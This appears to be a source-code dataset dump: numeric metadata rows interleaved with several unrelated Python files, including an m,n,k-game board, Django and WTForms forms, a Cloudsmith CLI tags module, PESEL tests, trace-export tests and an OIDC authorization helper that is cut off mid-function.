2,796
5.035842
0.189964
0.106762
0.076868
0.082562
0.824199
0.776512
0.776512
0.776512
0.730249
0.730249
0
0.020049
0.268598
2,796
105
80
26.628571
0.666993
0.629828
0
0.071429
0
0
0.082063
0
0
0
0
0
0
1
0.178571
false
0.178571
0
0
0.25
0.107143
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
7
bda5691ceabca9d9b32498222c4155793f52475a
2,325
py
Python
src/mnkgame.py
isihya/minimax_algorithm_MNKgame
9876c12d065422334d87bf24c6d82171c7ace89e
[ "MIT" ]
null
null
null
src/mnkgame.py
isihya/minimax_algorithm_MNKgame
9876c12d065422334d87bf24c6d82171c7ace89e
[ "MIT" ]
null
null
null
src/mnkgame.py
isihya/minimax_algorithm_MNKgame
9876c12d065422334d87bf24c6d82171c7ace89e
[ "MIT" ]
null
null
null
import numpy as np

from game import Game


class MNKgame(Game):
    """m,n,k-game board with win detection.

    https://en.wikipedia.org/wiki/M,n,k-game
    If m=3, n=3, k=3. This is TicTakToe and default.

    The board ``field`` is an (n, m) array: the first index i is the row
    (0..n-1), the second index j is the column (0..m-1).  Cell values:
    1 = player, -1 = enemy, 0 = empty.
    """

    def __init__(self, n=3, m=3, k=3, field=None):
        self.n = n  # number of rows
        self.m = m  # number of columns
        self.k = k  # consecutive stones needed to win
        self.field = field
        if field is None:
            self.field = np.zeros((n, m))
        self.winner = 0

    def evaluate(self, field) -> int:
        """Return 1 if the player has k in a row, -1 for the enemy, else 0.

        Covers all four directions by starting one scan per border cell.
        (Annotation fixed: this returns an int score, not a bool.)
        """
        # down: one scan per column from the top row
        for x in range(self.m):
            score = self.scan(field, (1, 0), 0, x)
            if score != 0:
                return score
        # right: one scan per row from the leftmost column
        for y in range(self.n):
            score = self.scan(field, (0, 1), y, 0)
            if score != 0:
                return score
        # right-down diagonals: start from the top row and the left column
        for x in range(self.m):
            score = self.scan(field, (1, 1), 0, x)
            if score != 0:
                return score
        for y in range(self.n):
            score = self.scan(field, (1, 1), y, 0)
            if score != 0:
                return score
        # right-up (anti-)diagonals: start from the bottom row and the left
        # column.  BUG FIX: the old code started at row self.m — off the
        # board whenever m >= n, so those scans always returned 0 — and
        # iterated the wrong ranges, missing anti-diagonal wins that start
        # in columns >= 1 of the bottom row.
        for x in range(self.m):
            score = self.scan(field, (-1, 1), self.n - 1, x)
            if score != 0:
                return score
        for y in range(self.n):
            score = self.scan(field, (-1, 1), y, 0)
            if score != 0:
                return score
        return 0

    def scan(self, field, d, i, j) -> int:
        """Walk from (i, j) in direction d looking for k consecutive stones.

        Returns 1 (player) or -1 (enemy) as soon as k consecutive stones of
        that side are found, else 0 when the walk leaves the board.
        (Annotation fixed: returns an int score, not a bool.)
        """
        cnt_player = 0
        cnt_enemy = 0
        while(self.is_in_field(i, j)):
            if int(field[i][j]) == 1:
                # BUG FIX: a player's stone must break the enemy's run (and
                # vice versa); previously only empty cells reset the
                # counters, so alternating stones like 1,-1,1,-1,1 could be
                # miscounted as k-in-a-row.
                cnt_enemy = 0
                cnt_player += 1
                if cnt_player == self.k:
                    return 1
            elif int(field[i][j]) == -1:
                cnt_player = 0
                cnt_enemy += 1
                if cnt_enemy == self.k:
                    return -1
            else:
                # empty cell breaks both runs
                cnt_player = 0
                cnt_enemy = 0
            i += d[0]
            j += d[1]
        return 0

    def is_in_field(self, i, j):
        """Return True when (i, j) is a valid (row, col) board coordinate."""
        if 0 <= i and i < self.n and 0 <= j and j < self.m:
            return True
        return False

    def update(self, action, val):
        """Place ``val`` on the board at ``action`` = (row, col)."""
        self.field[action[0]][action[1]] = val

    def get_actions(self, field):
        """Return the list of empty (row, col) coordinates; [] when full."""
        indexes = np.where(field == 0)
        if len(indexes[0]) == 0:
            return []
        return list(zip(indexes[0], indexes[1]))
28.012048
59
0.44129
324
2,325
3.114198
0.20679
0.048563
0.065411
0.107037
0.424182
0.420218
0.349851
0.328048
0.328048
0.296333
0
0.040335
0.434839
2,325
82
60
28.353659
0.727549
0.051613
0
0.333333
0
0
0
0
0
0
0
0
0
1
0.090909
false
0
0.030303
0
0.348485
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bda5f88b1ed70dd6d4320c4922009e7031b24847
2,721
py
Python
memoit/main/forms.py
Szymon-I/Memo-IT-App
f435331c4fbd68d34a5fb1d1f6b54117bab6b864
[ "MIT" ]
null
null
null
memoit/main/forms.py
Szymon-I/Memo-IT-App
f435331c4fbd68d34a5fb1d1f6b54117bab6b864
[ "MIT" ]
14
2019-08-06T02:06:17.000Z
2022-03-11T23:49:01.000Z
memoit/main/forms.py
Szymon-I/Memo-IT-App
f435331c4fbd68d34a5fb1d1f6b54117bab6b864
[ "MIT" ]
null
null
null
from django import forms
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
from .choices import *
from django.contrib.auth.forms import AuthenticationForm
from django.core.exceptions import ObjectDoesNotExist
from django.forms import ValidationError


class EmailAuthenticationForm(AuthenticationForm):
    """Authentication form accepting either a username or an email address.

    An identifier containing '@' is resolved to the matching user's
    username before the standard authentication validation runs.
    """

    def clean_username(self):
        username = self.data['username']
        if '@' not in username:
            return username
        try:
            return User.objects.get(email=username).username
        except ObjectDoesNotExist:
            raise ValidationError(
                self.error_messages['invalid_login'],
                code='invalid_login',
                params={'username': self.username_field.verbose_name},
            )


class NewUserForm(UserCreationForm):
    """Registration form extending UserCreationForm with a required email."""

    email = forms.EmailField(required=True)

    class Meta:
        model = User
        fields = ("username", "email", "password1", "password2")

    def save(self, commit=True):
        """Build the user instance; persist it only when commit is True."""
        user = super(NewUserForm, self).save(commit=False)
        if commit:
            user.save()
        return user


class NoteForm(forms.Form):
    """Form for creating a basic text note."""

    title = forms.CharField(max_length=100)
    content = forms.CharField(
        widget=forms.Textarea(
            attrs={'width': "100%", 'cols': "80", 'rows': "20", 'height': '100%'}),
        required=False)
    theme = forms.ChoiceField(
        choices=THEMES, label="Theme", initial='',
        widget=forms.Select(), required=True)


class NoteListForm(forms.Form):
    """Form for creating a list-style note (items entered one at a time)."""

    title = forms.CharField(max_length=100)
    content = forms.CharField(
        required=False, label="List items",
        widget=forms.TextInput(attrs={'placeholder': 'Add item and press Enter'}))
    theme = forms.ChoiceField(
        choices=THEMES, label="Theme", initial='',
        widget=forms.Select(), required=True)


class NotePictureForm(forms.Form):
    """Form for creating a picture note (image is mandatory)."""

    title = forms.CharField(max_length=100)
    content = forms.CharField(
        widget=forms.Textarea(
            attrs={'width': "100%", 'cols': "80", 'rows': "20", 'height': '100%'}),
        required=False)
    picture = forms.ImageField()


class NotePictureFormUpdate(forms.Form):
    """Picture-note edit form; the image is optional so the existing one can be kept."""

    title = forms.CharField(max_length=100)
    content = forms.CharField(
        widget=forms.Textarea(
            attrs={'width': "100%", 'cols': "80", 'rows': "20", 'height': '100%'}),
        required=False)
    picture = forms.ImageField(required=False)
37.791667
117
0.669974
307
2,721
5.905537
0.345277
0.061776
0.030888
0.041919
0.408163
0.408163
0.372863
0.372863
0.372863
0.372863
0
0.020456
0.209482
2,721
71
118
38.323944
0.822408
0.105108
0
0.215686
0
0
0.091433
0
0
0
0
0
0
1
0.039216
false
0.019608
0.137255
0
0.607843
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bda7487b706cb9a94241cf9262532248e9f7dfec
4,617
py
Python
tests/export_traces_test.py
galizia-lab/pyview
07bef637b0c60fae8830c1b3947e4a7bcd14bb2c
[ "BSD-3-Clause" ]
2
2021-11-07T10:17:16.000Z
2021-11-07T10:17:19.000Z
tests/export_traces_test.py
galizia-lab/pyview
07bef637b0c60fae8830c1b3947e4a7bcd14bb2c
[ "BSD-3-Clause" ]
5
2021-11-03T12:43:03.000Z
2021-12-16T10:34:52.000Z
tests/export_traces_test.py
galizia-lab/pyview
07bef637b0c60fae8830c1b3947e4a7bcd14bb2c
[ "BSD-3-Clause" ]
1
2021-09-23T15:46:26.000Z
2021-09-23T15:46:26.000Z
from common import initialize_test_yml_list_measurement
from view import VIEW
import pathlib as pl
import shutil
from view.python_core.ctvs import get_all_available_ctvs
from view.python_core.gdm_generation.gdm_data_classes import GDMFile


class TraceExporter(object):
    """Drives a VIEW instance to export glodatamix traces for the test animal."""

    def __init__(self):
        super().__init__()
        test_yml, self.test_animal, self.test_measu = initialize_test_yml_list_measurement()
        self.view = VIEW()
        self.view.update_flags_from_ymlfile(test_yml)

    def load_and_export(self, flags_to_update, file_suffix, flags_suffix):
        """Accumulate glodatamix data over all measurements and write one CSV.

        flags_to_update: flag overrides applied before the export.
        file_suffix: appended to the output folder name.
        flags_suffix: appended to the output file name.
        """
        self.view.update_flags(flags_to_update)
        self.view.initialize_animal(self.test_animal)
        roi_data_dict, roi_file = self.view.get_roi_info_for_current_animal()

        # accumulate glodatamix rows over every measurement of the animal
        combined_gdm = GDMFile()
        for measu in self.view.get_measus_for_current_animal(analyze_values_to_use=(1,)):
            self.view.load_measurement_data_from_current_animal(measu)
            self.view.calculate_signals()
            gdm_file_this_measu, _ = self.view.get_gdm_file_for_current_measurement(roi_data_dict)
            combined_gdm.append_from_a_gdm_file(gdm_file_this_measu)

        # output layout: <STG_OdorReportPath>/test_gdms/<stem><file_suffix>/gdm<flags_suffix><ext>
        output_file_path = pl.Path(self.view.flags.get_gloDatamix_file_for_current_animal())
        test_gdm_folder = (
            pl.Path(self.view.flags["STG_OdorReportPath"]) / "test_gdms"
            / f"{output_file_path.stem}{file_suffix}"
        )
        if not test_gdm_folder.is_dir():
            test_gdm_folder.mkdir(parents=True)
        test_output_file = test_gdm_folder / f"gdm{flags_suffix}{output_file_path.suffix}"

        combined_gdm.write_to_csv(test_output_file)


def test_export_traces_rois():
    """Testing exporting traces using .roi files"""
    exporter = TraceExporter()
    coor_path = pl.Path(exporter.view.flags["STG_OdormaskPath"])
    dest_roi_file = coor_path / "Fake_data.roi"
    for fle in coor_path.iterdir():
        # only fake-data ROI files are copied into place and exported
        if not (fle.name.startswith("FakeData") and fle.suffix == ".roi"):
            continue
        shutil.copy(str(fle), str(dest_roi_file))
        exporter.load_and_export(
            flags_to_update={"RM_ROITrace": 3},
            file_suffix=f"_from_roi{fle.stem.lstrip('FakeData')}",
            flags_suffix="_defaults"
        )
        dest_roi_file.unlink()


def test_export_traces_mask_tif():
    """Testing exporting traces using .roi.tif files"""
    exporter = TraceExporter()
    exporter.load_and_export(
        flags_to_update={"RM_ROITrace": 4},
        file_suffix="_from_roi_tif",
        flags_suffix="_defaults"
    )


def test_export_traces_different_ctvs():
    """Testing exporting traces with different CTVs"""
    exporter = TraceExporter()
    for ctv in get_all_available_ctvs():
        exporter.load_and_export(
            flags_to_update={"RM_ROITrace": 3, "CTV_Method": ctv},
            file_suffix="_from_roi",
            flags_suffix=f"_ctv{ctv}"
        )


def test_export_traces_within_ROI():
    """Testing exporting traces considering the area file"""
    exporter = TraceExporter()
    exporter.load_and_export(
        flags_to_update={"RM_ROITrace": 3, "GDM_withinArea": True},
        file_suffix="_from_roi",
        flags_suffix="_withinArea_True"
    )


def test_export_traces_chunks_only():
    """Testing exporting traces considering the area file"""
    exporter = TraceExporter()
    exporter.load_and_export(
        flags_to_update={
            "RM_ROITrace": 3,
            "GDM_outputType": "chunks_only",
            "GDM_chunkPostStim": 2,  # in seconds
            "GDM_chunkPreStim": 2,  # in seconds
        },
        file_suffix="_chunks_only",
        flags_suffix="_2secPrePostStim"
    )
    exporter.load_and_export(
        flags_to_update={
            "RM_ROITrace": 3,
            "GDM_outputType": "chunks_only",
            "GDM_chunkPostStim": 100,  # in seconds
            "GDM_chunkPreStim": 100,  # in seconds
        },
        file_suffix="_chunks_only",
        flags_suffix="_full"
    )


if __name__ == '__main__':
    test_export_traces_rois()
    # test_export_traces_mask_tif()
    # test_export_traces_within_ROI()
    test_export_traces_chunks_only()
27.981818
98
0.65627
566
4,617
4.922261
0.236749
0.031587
0.051687
0.045226
0.335607
0.208543
0.208543
0.208543
0.179828
0.179828
0
0.004638
0.252762
4,617
165
99
27.981818
0.802899
0.126922
0
0.225806
0
0
0.131118
0.029419
0
0
0
0
0
1
0.075269
false
0
0.064516
0
0.150538
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bda7fb3776a5d1e908f28700d29753c520db4037
2,551
py
Python
app/entries/forms.py
singh-prashant/blog
7c4d2e2d6890d3f0b48741b1090e41a990cad1de
[ "MIT" ]
null
null
null
app/entries/forms.py
singh-prashant/blog
7c4d2e2d6890d3f0b48741b1090e41a990cad1de
[ "MIT" ]
null
null
null
app/entries/forms.py
singh-prashant/blog
7c4d2e2d6890d3f0b48741b1090e41a990cad1de
[ "MIT" ]
null
null
null
from wtforms import Form, StringField, TextAreaField,SelectField, FileField,HiddenField
from wtforms.validators import DataRequired, Optional, Email, URL, Length
from models import Entry, Tag


class TagField(StringField):
    """String field that round-trips a list of Tag model instances.

    Rendered as a comma-separated string; on submit the string is parsed
    back into existing and freshly-created (unsaved) Tag instances.
    """

    def _value(self):
        # Display tags as a comma-separated list.
        if not self.data:
            return ''
        return ', '.join([tag.name for tag in self.data])

    def get_tags_from_string(self, tag_string):
        """Turn a comma-separated string into a list of Tag instances."""
        raw_tags = tag_string.split(',')
        # Drop empty fragments and surrounding whitespace.
        tag_names = [name.strip() for name in raw_tags if name.strip()]
        # Look up the tags that already exist in the database.
        existing_tags = Tag.query.filter(Tag.name.in_(tag_names))
        # Anything not found must be a brand-new tag name.
        new_names = set(tag_names) - set([tag.name for tag in existing_tags])
        # Build unsaved Tag instances for the new names.
        new_tags = [Tag(name=name) for name in new_names]
        # Existing tags plus the new, not-yet-saved ones.
        return list(existing_tags) + new_tags

    def process_formdata(self, valuelist):
        self.data = self.get_tags_from_string(valuelist[0]) if valuelist else []


class ImageForm(Form):
    """Single-file upload form."""

    file = FileField('Image File')


class EntryForm(Form):
    """Create/edit form for a blog entry."""

    title = StringField('Title', validators=[DataRequired()])
    body = TextAreaField('Body', validators=[DataRequired()])
    status = SelectField(
        'Entry Status',
        choices=(
            (Entry.STATUS_PUBLIC,'Public'),
            (Entry.STATUS_DRAFT,'Draft')),
        coerce=int
    )
    tags = TagField(
        'Tag',
        description='Separate multiple tags with commas.'
    )

    def save_entry(self, entry):
        """Copy form data onto the entry, refresh its slug, and return it."""
        self.populate_obj(entry)
        entry.generate_slug()
        return entry


class CommentForm(Form):
    """Comment form; valid only against a published entry."""

    name = StringField('Name',validators=[DataRequired()])
    email = StringField('Email',validators=[DataRequired(),Email()])
    url = StringField('Url', validators=[Optional(), URL()])
    body = TextAreaField('Comment', validators=[DataRequired(),Length(min=10, max=3000)])
    entry_id = HiddenField(validators=[DataRequired()])

    def validate(self):
        if not super(CommentForm, self).validate():
            return False
        # The referenced entry must exist and be public.
        entry = Entry.query.filter(
            (Entry.status == Entry.STATUS_PUBLIC),
            (Entry.id == self.entry_id.data)
        ).first()
        return bool(entry)
31.109756
89
0.633477
301
2,551
5.265781
0.355482
0.083281
0.012618
0.016404
0.018927
0
0
0
0
0
0
0.003686
0.255586
2,551
82
90
31.109756
0.830964
0.104273
0
0.035714
0
0
0.044737
0
0
0
0
0
0
1
0.089286
false
0
0.053571
0
0.517857
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bda9a1746f79218c2ab9314175f0e74a63028e6b
11,323
py
Python
cloudsmith_cli/cli/commands/tags.py
ThomasAdam/cloudsmith-cli
c335645bf947381a8f5c287bcc0ca6de7a809bdd
[ "Apache-2.0" ]
19
2018-02-14T23:48:27.000Z
2022-03-12T20:58:09.000Z
cloudsmith_cli/cli/commands/tags.py
ThomasAdam/cloudsmith-cli
c335645bf947381a8f5c287bcc0ca6de7a809bdd
[ "Apache-2.0" ]
68
2017-12-03T04:16:55.000Z
2022-03-03T09:45:48.000Z
cloudsmith_cli/cli/commands/tags.py
ThomasAdam/cloudsmith-cli
c335645bf947381a8f5c287bcc0ca6de7a809bdd
[ "Apache-2.0" ]
10
2017-12-25T14:36:24.000Z
2021-12-10T11:10:59.000Z
# -*- coding: utf-8 -*- """CLI/Commands - List objects.""" from __future__ import absolute_import, print_function, unicode_literals from operator import itemgetter import click from ...core.api.packages import ( get_package_tags as api_get_package_tags, tag_package as api_tag_package, ) from .. import command, decorators, utils, validators from ..exceptions import handle_api_exceptions from ..utils import maybe_spinner from .main import main def _parse_tags(tags): """Parse tags from CSV into a list.""" return [x.strip() for x in (tags or "").split(",")] def _print_tags(opts, all_tags, all_immutable_tags): """Print the tags for a package.""" all_combined_tags = {"tags": all_tags, "tags_immutable": all_immutable_tags} if utils.maybe_print_as_json(opts, all_combined_tags): return headers = ["Tag", "Type", "Immutable"] rows = [] for tag_type, tags in sorted(all_tags.items(), key=itemgetter(0)): immutable_tags = all_immutable_tags.get(tag_type) or [] for tag in sorted(tags): immutable = "Yes" if tag in immutable_tags else "No" rows.append( [ click.style(tag, fg="cyan"), click.style(tag_type, fg="yellow"), click.style(immutable, fg="magenta"), ] ) if all_tags: click.echo() utils.pretty_print_table(headers, rows) click.echo() num_results = len(rows) list_suffix = "tag%s" % ("s" if num_results != 1 else "") utils.pretty_print_list_info(num_results=num_results, suffix=list_suffix) @main.group(name="tags", cls=command.AliasGroup, aliases=["tag"]) @decorators.common_cli_config_options @decorators.common_cli_output_options @decorators.common_api_auth_options @decorators.initialise_api @click.pass_context def tags_(ctx, opts): # pylint: disable=unused-argument """ Manage the tags for a package in a repository. See the help for subcommands for more information on each. 
""" @tags_.command(name="list", aliases=["ls"]) @decorators.common_cli_config_options @decorators.common_cli_output_options @decorators.common_api_auth_options @decorators.initialise_api @click.argument( "owner_repo_package", metavar="OWNER/REPO/PACKAGE", callback=validators.validate_owner_repo_package, ) @click.pass_context def list_tags(ctx, opts, owner_repo_package): """ List tags for a package in a repository. This requires appropriate (read) permissions for the package. - OWNER/REPO/PACKAGE: Specify the OWNER namespace (i.e. user or org), the REPO name where the package is stored, and the PACKAGE identifier of the package itself. All separated by a slash. Example: 'your-org/awesome-repo/better-pkg'. Full CLI example: $ cloudsmith tags list your-org/awesome-repo/better-pkg """ owner, repo, package = owner_repo_package click.echo( "Listing tags for the '%(package)s' package ... " % {"package": click.style(package, bold=True)}, nl=False, ) context_msg = "Failed to list tags for the package!" with handle_api_exceptions(ctx, opts=opts, context_msg=context_msg): with maybe_spinner(opts): package_tags, package_tags_immutable = api_get_package_tags( owner=owner, repo=repo, identifier=package ) click.secho("OK", fg="green") _print_tags(opts, package_tags, package_tags_immutable) @tags_.command(name="add") @decorators.common_cli_config_options @decorators.common_cli_output_options @decorators.common_api_auth_options @decorators.initialise_api @click.argument( "owner_repo_package", metavar="OWNER/REPO/PACKAGE", callback=validators.validate_owner_repo_package, ) @click.argument("tags", metavar="TAGS") @click.option( "--immutable", default=False, is_flag=True, help=( "If true, the tags created will be immutable (cannot be changed). In " "practice, this means the tags cannot be (easily) deleted. A repository " "admin can explicitly remove immutable tags." 
), ) @click.pass_context def add_tags(ctx, opts, owner_repo_package, tags, immutable): """ Add tags to a package in a repository. This requires appropriate (write) permissions for the package. - OWNER/REPO/PACKAGE: Specify the OWNER namespace (i.e. user or org), the REPO name where the package is stored, and the PACKAGE identifier of the package itself. All separated by a slash. Example: 'your-org/awesome-repo/better-pkg'. - TAGS: A comma-separated value list of the tags you want to add. Example: foo,bar Full CLI example: $ cloudsmith tags add your-org/awesome-repo/better-pkg foo,bar """ owner, repo, package = owner_repo_package tags = _parse_tags(tags) click.echo( "Adding '%(tags)s' tag%(s)s to the '%(package)s' package ... " % { "package": click.style(package, bold=True), "tags": click.style(", ".join(tags or [])), "s": "s" if len(tags) != 1 else "", }, nl=False, ) context_msg = "Failed to add tags to package!" with handle_api_exceptions(ctx, opts=opts, context_msg=context_msg): with maybe_spinner(opts): package_tags, package_tags_immutable = api_tag_package( owner=owner, repo=repo, identifier=package, data={"action": "add", "tags": tags, "is_immutable": immutable}, ) click.secho("OK", fg="green") _print_tags(opts, package_tags, package_tags_immutable) @tags_.command(name="clear") @decorators.common_cli_config_options @decorators.common_cli_output_options @decorators.common_api_auth_options @decorators.initialise_api @click.argument( "owner_repo_package", metavar="OWNER/REPO/PACKAGE", callback=validators.validate_owner_repo_package, ) @click.pass_context def clear_tags(ctx, opts, owner_repo_package): """ Clear all existing (non-immutable) tags from a package in a repository. This requires appropriate (write) permissions for the package. - OWNER/REPO/PACKAGE: Specify the OWNER namespace (i.e. user or org), the REPO name where the package is stored, and the PACKAGE identifier of the package itself. All separated by a slash. 
Example: 'your-org/awesome-repo/better-pkg'. Full CLI example: $ cloudsmith tags clear your-org/awesome-repo/better-pkg """ owner, repo, package = owner_repo_package click.echo( "Clearing tags on the '%(package)s' package ... " % {"package": click.style(package, bold=True)}, nl=False, ) context_msg = "Failed to clear tags on package!" with handle_api_exceptions(ctx, opts=opts, context_msg=context_msg): with maybe_spinner(opts): package_tags, package_tags_immutable = api_tag_package( owner=owner, repo=repo, identifier=package, data={"action": "clear"} ) click.secho("OK", fg="green") _print_tags(opts, package_tags, package_tags_immutable) @tags_.command(name="remove", aliases=["rm"]) @decorators.common_cli_config_options @decorators.common_cli_output_options @decorators.common_api_auth_options @decorators.initialise_api @click.argument( "owner_repo_package", metavar="OWNER/REPO/PACKAGE", callback=validators.validate_owner_repo_package, ) @click.argument("tags", metavar="TAGS") @click.pass_context def remove_tags(ctx, opts, owner_repo_package, tags): """ Remove tags from a package in a repository. This requires appropriate (write) permissions for the package. - OWNER/REPO/PACKAGE: Specify the OWNER namespace (i.e. user or org), the REPO name where the package is stored, and the PACKAGE identifier of the package itself. All separated by a slash. Example: 'your-org/awesome-repo/better-pkg'. - TAGS: A comma-separated value list of the tags you want to remove. Example: foo,bar Full CLI example: $ cloudsmith tags remove your-org/awesome-repo/better-pkg foo,bar """ owner, repo, package = owner_repo_package tags = _parse_tags(tags) click.echo( "Removing '%(tags)s' tag%(s)s to the '%(package)s' package ... " % { "package": click.style(package, bold=True), "tags": click.style(", ".join(tags or [])), "s": "s" if len(tags) != 1 else "", }, nl=False, ) context_msg = "Failed to remove tags from package!" 
with handle_api_exceptions(ctx, opts=opts, context_msg=context_msg): with maybe_spinner(opts): package_tags, package_tags_immutable = api_tag_package( owner=owner, repo=repo, identifier=package, data={"action": "remove", "tags": tags}, ) click.secho("OK", fg="green") _print_tags(opts, package_tags, package_tags_immutable) @tags_.command(name="replace") @decorators.common_cli_config_options @decorators.common_cli_output_options @decorators.common_api_auth_options @decorators.initialise_api @click.argument( "owner_repo_package", metavar="OWNER/REPO/PACKAGE", callback=validators.validate_owner_repo_package, ) @click.argument("tags", metavar="TAGS") @click.option( "--immutable", default=False, is_flag=True, help=( "If true, the tags created will be immutable (cannot be changed). In " "practice, this means the tags cannot be (easily) deleted. A repository " "admin can explicitly remove immutable tags." ), ) @click.pass_context def replace_tags(ctx, opts, owner_repo_package, tags, immutable): """ Replace all existing (non-immutable) tags on a package in a repository. This requires appropriate (write) permissions for the package. - OWNER/REPO/PACKAGE: Specify the OWNER namespace (i.e. user or org), the REPO name where the package is stored, and the PACKAGE identifier of the package itself. All separated by a slash. Example: 'your-org/awesome-repo/better-pkg'. - TAGS: A comma-separated value list of the tags you want to replace existing with. Example: foo,bar Full CLI example: $ cloudsmith tags replace your-org/awesome-repo/better-pkg foo,bar """ owner, repo, package = owner_repo_package tags = _parse_tags(tags) click.echo( "Replacing existing with '%(tags)s' tag%(s)s on the '%(package)s' package ... " % { "package": click.style(package, bold=True), "tags": click.style(", ".join(tags or [])), "s": "s" if len(tags) != 1 else "", }, nl=False, ) context_msg = "Failed to replace tags on package!" 
with handle_api_exceptions(ctx, opts=opts, context_msg=context_msg): with maybe_spinner(opts): package_tags, package_tags_immutable = api_tag_package( owner=owner, repo=repo, identifier=package, data={"action": "replace", "tags": tags, "is_immutable": immutable}, ) click.secho("OK", fg="green") _print_tags(opts, package_tags, package_tags_immutable)
31.192837
87
0.666078
1,473
11,323
4.937542
0.12831
0.049498
0.076997
0.031624
0.799808
0.786746
0.774508
0.765434
0.731473
0.731473
0
0.000682
0.222821
11,323
362
88
31.279006
0.825795
0.241191
0
0.624434
0
0.004525
0.159192
0
0
0
0
0
0
1
0.036199
false
0.027149
0.036199
0
0.081448
0.045249
0
0
0
null
0
0
0
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
5
bdaa3c35e12cb6be60fdc05cc2cfe86bb78ba70c
764
py
Python
tests/test_correct_pesel.py
matee911/pypesel
393e4bf4891b4bbb94cd077b26161dd2e94eed31
[ "Apache-2.0" ]
null
null
null
tests/test_correct_pesel.py
matee911/pypesel
393e4bf4891b4bbb94cd077b26161dd2e94eed31
[ "Apache-2.0" ]
null
null
null
tests/test_correct_pesel.py
matee911/pypesel
393e4bf4891b4bbb94cd077b26161dd2e94eed31
[ "Apache-2.0" ]
null
null
null
from pesel import Pesel
import pytest


@pytest.fixture(scope='session', params=["65432101239"])
def pesel_value(request):
    """A valid PESEL string, shared across the whole test session."""
    return request.param


@pytest.fixture(scope='session')
def pesel_obj(pesel_value):
    """A Pesel instance built from the session's PESEL string."""
    return Pesel(pesel_value)


def test_correct_pesel(pesel_obj, pesel_value):
    """The parsed object keeps the original PESEL string."""
    pytest.assume(pesel_obj.value == pesel_value)


def test_correct_pesel_gender(pesel_obj):
    """Gender decoded from the PESEL digits."""
    pytest.assume(pesel_obj.gender == 'male')


def test_correct_pesel_male(pesel_obj):
    """Boolean male flag matches the decoded gender."""
    pytest.assume(pesel_obj.male is True)


def test_correct_pesel_year(pesel_obj):
    """Birth year decoded from the PESEL digits."""
    pytest.assume(pesel_obj.year == 2165)


def test_correct_pesel_month(pesel_obj):
    """Birth month decoded from the PESEL digits."""
    pytest.assume(pesel_obj.month == 3)


def test_incorrect_pesel_day(pesel_obj):
    """Birth day decoded from the PESEL digits."""
    pytest.assume(pesel_obj.day == 21)
20.648649
56
0.764398
113
764
4.858407
0.256637
0.189435
0.185792
0.218579
0.360656
0.360656
0
0
0
0
0
0.026946
0.125654
764
36
57
21.222222
0.79491
0
0
0
0
0
0.037958
0
0
0
0
0
0
1
0.4
false
0
0.1
0.1
0.6
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
4
bdab079e812edf7ae50cfd1cbee57eb0f820a648
5,978
py
Python
oidc/endpoints/authorize.py
didx-xyz/yoma-oidc-bridge
7e3ff6ab3ea4fed01cd7d4c113c7c3b3244356eb
[ "Apache-2.0" ]
null
null
null
oidc/endpoints/authorize.py
didx-xyz/yoma-oidc-bridge
7e3ff6ab3ea4fed01cd7d4c113c7c3b3244356eb
[ "Apache-2.0" ]
null
null
null
oidc/endpoints/authorize.py
didx-xyz/yoma-oidc-bridge
7e3ff6ab3ea4fed01cd7d4c113c7c3b3244356eb
[ "Apache-2.0" ]
null
null
null
"""OIDC authorization helpers: create a proof request, persist the auth
session and return a shortened presentation-request URL."""
from aca.client import ACAClient
from aries_cloudcontroller.aries_controller import AriesAgentController
from asgiref.sync import sync_to_async, async_to_sync
from django.utils import timezone
# FIX: datetime was imported from the stdlib twice (once as `timedelta`
# alone, once as `datetime, timedelta`); merged into a single import.
from datetime import datetime, timedelta
from aca.models import PresentationFactory
from oidc.utils.shortener import create_short_url
from oidc.models import AuthSession, PresentationConfigurations, MappedUrl
from django.conf import settings
import asyncio

# NOTE(review): hard-coded ngrok webhook endpoints — presumably left over
# from development; confirm before deploying.
WEBHOOK_HOST = "https://8b1dec9d51dd.ngrok.io"
WEBHOOK_PORT = 443
WEBHOOK_BASE = "https://8b1dec9d51dd.ngrok.io/webhooks/"


def authorization(pres_req_conf_id: str, request_parameters: dict):
    """Create a proof request for the given presentation configuration.

    Persists an AuthSession (valid for 60 minutes) plus a shortened URL
    mapping, and returns (short_url, session_pk, presentation_request_id,
    b64_presentation).
    """
    aca_client = ACAClient(settings.ACA_PY_URL, settings.ACA_PY_TRANSPORT_URL)
    presentation_configuration = PresentationConfigurations.objects.get(
        id=pres_req_conf_id
    )
    response = aca_client.create_proof_request(presentation_configuration.to_json())
    print('PROOF CREATE', response)
    public_did = aca_client.get_public_did()
    print('DID', public_did)
    endpoint = aca_client.get_endpoint_url()
    print('ENDPOINT', endpoint)
    presentation_request = PresentationFactory.from_params(
        presentation_request=response.get("presentation_request"),
        p_id=response.get("thread_id"),
        verkey=[public_did.get("verkey")],
        endpoint=endpoint,
    ).to_json()
    print('PROOF REQUEST ', presentation_request)
    presentation_request_id = response["presentation_exchange_id"]
    session = AuthSession.objects.create(
        presentation_record_id=pres_req_conf_id,
        presentation_request_id=presentation_request_id,
        presentation_request=presentation_request,
        request_parameters=request_parameters,
        expired_timestamp=timezone.now() + timedelta(minutes=60),
    )
    url, b64_presentation = create_short_url(presentation_request)
    mapped_url = MappedUrl.objects.create(url=url, session=session)
    short_url = mapped_url.get_short_url()
    return short_url, str(session.pk), presentation_request_id, b64_presentation


@sync_to_async
def getPresentationConfig(pres_req_conf_id: str):
    """Fetch the presentation configuration by id (sync ORM wrapped for async)."""
    return PresentationConfigurations.objects.get(
